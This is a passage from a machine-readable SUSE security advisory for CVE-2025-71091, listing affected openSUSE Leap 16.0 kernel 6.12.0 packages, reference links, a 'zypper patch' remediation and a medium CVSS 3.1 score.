"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71091",
"url": "https://www.suse.com/security/cve/CVE-2025-71091"
},
{
"category": "external",
"summary": "SUSE Bug 1256773 for CVE-2025-71091",
"url": "https://bugzilla.suse.com/1256773"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
